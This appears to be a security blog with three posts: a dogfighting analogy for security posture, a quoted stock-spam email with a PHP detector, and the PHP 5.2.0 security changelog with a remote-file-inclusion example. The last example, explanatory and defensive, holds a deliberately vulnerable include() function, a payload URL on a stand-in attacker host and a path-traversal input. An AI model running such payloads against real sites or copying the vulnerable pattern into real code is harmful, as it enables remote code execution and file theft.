Basic Fighter Maneuvers (BFM) and How They Relate To Information Security

I just watched an amazing documentary about the historic dogfight between Saburo Sakai and Pug Southerland, called “Secrets of the Dead: Dogfight Over Guadalcanal.”

The documentary discussed, in depth, the tactics the two pilots used when attacking and evading each other. Each pilot had distinct advantages during the dogfight.

Sakai’s plane, the Mitsubishi A6M2, better known as the “Zero,” was a lightweight, nimble plane with a huge operating range.

The plane’s lightweight airframe and skin, made of a high-tech duralumin alloy (aluminum alloyed with copper, manganese, and magnesium), gave the Zero its remarkable fuel efficiency, operating range, and agility. Its armament was impressive too: two 7.7 mm machine guns and two 20 mm cannons, a deadly combination that gave the pilot several options when engaging.

But the Zero’s engineers, charged with producing the lightest, fastest, deadliest fighter they could, skimped on vital protective gear at the pilot’s expense. The Zero was very lightly armored and had neither bulletproof glass nor the self-sealing fuel tanks that were becoming common on European and U.S. aircraft by WWII.

The Grumman F4F-4 Wildcat piloted by Pug Southerland was a very different aircraft. While the heavier Wildcat couldn’t match the Zero’s turning capabilities, climbing speed or range, it made up for its deficiencies with raw power (a 1,200-horsepower engine), superior diving speed, and an amazing ability to withstand punishment.

Southerland’s flying skill and intimate knowledge of his plane’s capabilities allowed him to survive against the quicker Zero. He even managed to gain the advantage, but when he had the chance to shoot down Sakai, his guns remained silent.

Since World War II, U.S. fighter pilots have been trained in Basic Fighter Maneuvers (BFM). BFMs are generally grouped into two categories:

  • Offensive BFM
  • Defensive BFM

BFM is a series of fluid and often improvised proactive and reactive actions, varying infinitely according to range, altitude, speed, aircraft type, weapons system type and any of an enormous range of other factors.

There are three basic situations in air combat maneuvering (ACM) that require BFM to convert them into a favorable result. The three situations, and the primary goal of a pilot in each, are:

  • Defensive – the pilot is in a weak position and is primarily concerned with denying the opponent a shot rather than achieving a dominant position. The goal here is to convert to a neutral situation, or to extend and escape the unfavorable position.
  • Neutral – neither pilot has a particular advantage, nominally defined as the ability to “point” the nose of the aircraft at the opponent with sufficient range to employ forward-firing ordnance (missiles/gun) before the opponent can do the same. Each is focused on converting to an offensive situation while forcing the opponent onto the defensive.
  • Offensive – the pilot is in a dominant position and is primarily concerned with prosecuting that advantage for a kill.

What does all of this have to do with information security, you might ask? Using the principles of BFM, one can evaluate the current security posture of an environment and take steps to improve it.

Your organization is in a Defensive position if:

  • You are reactive to incidents instead of having defined procedures to properly handle them
  • You are slow to adopt security best practices within your organization
  • You only update your infrastructure software/firmware when there is a major news story about another organization being compromised

This is the worst position for your organization to be in, because you are exactly the class of victim that attackers look for. If your staff is not prepared, and not trained, to handle an incident quickly and intelligently, the chance that the attacker will be noticed or caught drops. If you don’t update your software and firmware on a regular basis, you are putting the entire organization at risk: attackers monitor vendor mailing lists and newsgroups for flaws and exploits, so why wouldn’t you?

Your organization is in a Neutral position if:

  • You keep yourself, your team, and your superiors abreast of the latest security trends and issues
  • You actively update your servers, hosts, routers, switches, firewalls, and intrusion signatures to prevent malicious activity
  • You foster continuing education practices to keep yourself and your team educated on the latest methods for handling and profiling attacks

This isn’t the optimal position, but it is definitely more desirable than the Defensive one. Keeping yourself, your team, and your superiors abreast of the latest security trends and issues ensures that new attack vectors do not catch your organization by surprise, and knowing what is happening “in the wild” leaves you better prepared when an incident does occur.

This reminds me of an aerial maneuver called the Scissors, which a defending plane uses to get behind an attacking plane in a dogfight. The defending plane flies a vertical zigzag, pitching the nose up and down as it goes.

This decreases the plane’s forward speed during each climb by trading kinetic energy (speed) for gravitational potential energy (height); the average forward speed also drops because the airplane covers a much longer distance during the maneuver. The attacker, however, may attempt the same maneuver to remain offensive by staying behind the defending plane. The pilot who executes it best ends up in the better offensive position, above and behind the other plane.

You can see from the following diagram that it is quite easy to continue this maneuver over and over in an endless game of cat and mouse. All else being equal, the only way for one pilot to gain an advantage is for the other pilot to break the pattern:

[Diagram: the scissors maneuver]

When you actively update your enterprise infrastructure you not only reduce your systems’ risk of compromise, you also increase your visibility. For example, analysis of intrusion (IDS/IPS/HIPS) logs is worthless unless your signatures are current and properly tuned to detect anomalous traffic on your network.

As many of you know, I am a big proponent of continuous learning, especially in the security field. If you do not keep yourself educated on the latest attack and defense methods and practices, you quickly become obsolete, not to mention a liability.

Lastly, your organization is in an Offensive position if:

  • You can, with complete certainty, state that your organization is completely prepared for any attack, existing or not-yet-conceived
  • You rewrite all of your software, firmware, and operating environments to compensate for any and all attacks that could ever be attempted
  • You are capable of preemptive strikes on all potential attackers to eliminate the possibility of an attack

Obviously the Offensive position is the optimal stance you would wish to achieve. Unfortunately, all things being equal, it is completely impossible without the ability to predict the future. This is the panacea or silver-bullet position: there is no cure for every security issue. If a company released a product or service that could guarantee your organization a constant Offensive position, its shareholders would be dancing all the way to the bank.

I hope you enjoyed this article. I’d like to thank the people at PBS and the contributors to Wikipedia.org. Without them I would not have had the inspiration or the content to create this article.

Must be the “It’s ‘Random name here’ :)” spam day!

I’ve noticed a dramatic increase in a specific type of spam, over several accounts, over the past couple of days. Here is the format:

——– Original Message ——–
Subject: It’s Miranda 🙂
Date: Wed, 8 Nov 2006 22:35:26 +0180
From: Miranda Arias
To:

Our Hottest pick this year! Brand new issue Cana Petroleum!

VERY tightly held, in a booming business sector, with a huge publicity campaign starting up, Cana Petroleum (CNPM) is set to bring all our readers huge gains. We advise you to get in on this one and ride it to the top!

Symbol: CNPM
Current Price: $2.95
Projected Price: $11.40

Check the stats! Check the level 2! Imagine what this one will do when the full force of the PR campaign hits it, in conjunction with smashing news!

Major oil discovery? We are not permitted to say at this point. All we can say is that this one is going to see amazing appreciation in a very short period of time! This is your opportunity. Win big with CNPM!

Not only do I not care much about the stock market, I certainly wouldn’t take random stock tips sent by email. It really upsets me that tactics like this work on people; I say they work because if there weren’t a market for this type of direct advertising, people wouldn’t use it.
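As an added example, not code from the original post or from any real mail filter, here is a small PHP heuristic that flags this pump-and-dump template from the features visible in the message above: the “It’s <Name> :)” subject line, the impossible UTC offset in the Date: header (+0180 has 80 “minutes”), the “Symbol:” line with current/projected prices, and the hype vocabulary. The one-point-per-feature score, the phrase list, and the two sample messages are constructed for this demo; the spam sample uses an ASCII “:)” in the subject, on the assumption that the blog rendered the original as an emoji.

```php
<?php
// Added example, not code from the original post: a heuristic that flags the
// pump-and-dump stock spam quoted above from its headers and body. The feature list,
// the score (one point per feature) and both sample messages are constructed for this
// demo; nothing here comes from a real filter.

function pump_and_dump_score(string $raw): array
{
    // Split the raw message into header block and body at the first blank line.
    [$headers, $body] = array_pad(preg_split("/\r?\n\r?\n/", $raw, 2), 2, '');
    $reasons = [];

    // "It's <Firstname> :)" subject, the template seen across several accounts.
    if (preg_match('/^Subject:\s*It[\'’]s [A-Z][a-z]+\s*:-?\)/miu', $headers)) {
        $reasons[] = 'subject-template';
    }
    // A Date: header whose UTC offset has more than 59 "minutes" (e.g. +0180).
    if (preg_match('/^Date:.*[+-](\d{2})(\d{2})\s*$/mi', $headers, $m) && (int) $m[2] > 59) {
        $reasons[] = 'bogus-tz-offset';
    }
    // The stock pitch itself: a "Symbol:" line plus current and projected prices.
    if (preg_match('/^Symbol:\s*[A-Z]{3,5}\s*$/mi', $body)) {
        $reasons[] = 'ticker-symbol';
    }
    if (preg_match('/^Current Price:\s*\$?\d/mi', $body)
        && preg_match('/^Projected Price:\s*\$?\d/mi', $body)) {
        $reasons[] = 'price-projection';
    }
    // Hype vocabulary; two or more hits is treated as a signal.
    $hype = preg_match_all(
        '/\b(huge gains|ride it to the top|win big|get in on this|amazing appreciation)\b/i',
        $body
    );
    if ($hype >= 2) {
        $reasons[] = "hype-phrases({$hype})";
    }

    return ['score' => count($reasons), 'reasons' => $reasons];
}

// Constructed sample: the message quoted in the post, with an ASCII ":)" subject.
$spam = <<<'MAIL'
Subject: It's Miranda :)
Date: Wed, 8 Nov 2006 22:35:26 +0180
From: Miranda Arias

Our Hottest pick this year! Brand new issue Cana Petroleum!

VERY tightly held, in a booming business sector, with a huge publicity campaign starting up, Cana Petroleum (CNPM) is set to bring all our readers huge gains. We advise you to get in on this one and ride it to the top!

Symbol: CNPM
Current Price: $2.95
Projected Price: $11.40

Major oil discovery? We are not permitted to say at this point. All we can say is that this one is going to see amazing appreciation in a very short period of time! This is your opportunity. Win big with CNPM!
MAIL;

// Constructed sample: an ordinary operational mail that should score zero.
$ham = <<<'MAIL'
Subject: Re: Friday's change window
Date: Thu, 9 Nov 2006 09:12:00 +0100
From: ops@example.com

The firewall firmware update is scheduled for 22:00; signatures are being refreshed first.
MAIL;

foreach (['spam' => $spam, 'ham' => $ham] as $label => $msg) {
    $r = pump_and_dump_score($msg);
    printf("%-4s score=%d reasons=%s\n", $label, $r['score'], implode(',', $r['reasons']) ?: '-');
}
```

Each feature is weak on its own (a single bad timezone offset is just a broken mail client), which is why the function returns the list of reasons rather than a verdict: a filter would act on the combined score, and the reasons make the rule easy to tune when the template changes.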

I found this interesting calculator which puts a dollar value on the lost productivity incurred per user.

I also found this link to “Spam Economics.”

Security Enhancements and Fixes in PHP 5.2.0


  • Made PostgreSQL escaping functions in PostgreSQL and PDO extension keep track of character set encoding whenever possible.
  • Added allow_url_include, set to Off by default to disallow use of URLs for include and require.
  • Disable realpath cache when open_basedir and safe_mode are being used.
  • Improved safe_mode enforcement for error_log() function.
  • Fixed a possible buffer overflow in the underlying code responsible for htmlspecialchars() and htmlentities() functions.
  • Added missing safe_mode and open_basedir checks for the cURL extension.
  • Fixed overflow in str_repeat() & wordwrap() functions on 64bit machines.
  • Fixed handling of long paths inside the tempnam() function.
  • Fixed safe_mode/open_basedir checks for session.save_path, allowing them to account for extra parameters.
  • Fixed ini setting overload in the ini_restore() function.
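The allow_url_include item deserves a closer look, since it is the one a web developer acts on directly. The following is an added example, not code from PHP or from the changelog: it shows the remote file inclusion pattern that the new Off default closes, a runtime check that the hardened php.ini values are actually in effect, and the allowlist that application code still needs because the setting says nothing about local path traversal. The request parameter, page names and paths are hypothetical, and the code needs PHP 7.1 or later to run.

```php
<?php
// Added example, not code from PHP or from the changelog above. It shows the remote file
// inclusion pattern that the 5.2.0 default allow_url_include=Off closes, a runtime check
// for that setting, and the allowlist that application code still needs. The request
// parameter, page names and paths are hypothetical. Requires PHP 7.1 or later.

// Vulnerable pattern. With allow_url_fopen=On and, before 5.2.0, no separate switch for
// include/require, a request like ?page=http://attacker.example/shell.txt%3F made
// include() fetch the remote file and execute it as PHP.
function vulnerable_include(string $page): void
{
    include $page . '.php';   // DO NOT USE: attacker-controlled string reaches include()
}

// Runtime check that the hardened php.ini values are in effect:
//     allow_url_include = Off   ; the 5.2.0 default
//     allow_url_fopen   = Off   ; if nothing in the application needs remote fopen()
function url_include_disabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// allow_url_include=Off blocks http://, ftp://, data: and php://input in include(), but it
// does nothing about a local file reached through "../" traversal. Map a short token to a
// fixed path instead of building the path from input.
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;   // unknown token: refuse; never fall back to the raw value
}

function hardened_include(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        return;
    }
    include $file;
}

// Demo with constructed inputs (php rfi_demo.php): only the allowlisted token resolves.
foreach (['home', '../../../etc/passwd', 'http://attacker.example/shell.txt?', 'php://input'] as $input) {
    printf("%-40s -> %s\n", $input, resolve_page($input) ?? '(rejected)');
}
printf("allow_url_include disabled: %s\n", url_include_disabled() ? 'yes' : 'no');
```

The ini check is worth keeping in a deployment smoke test: a hosting provider or a stray .htaccess/php_admin_value line can turn allow_url_include back on, and the allowlist is what keeps the application safe if that happens.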